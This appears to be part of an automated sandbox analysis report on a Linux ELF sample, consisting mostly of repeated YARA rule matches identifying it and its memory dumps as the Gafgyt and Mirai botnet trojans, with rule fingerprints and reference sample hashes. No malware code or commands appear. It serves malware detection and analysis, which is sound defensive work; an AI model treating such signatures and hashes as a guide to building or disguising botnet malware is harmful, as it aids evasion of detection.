Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6237, result: successful Jump to behavior
Yara signature match
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
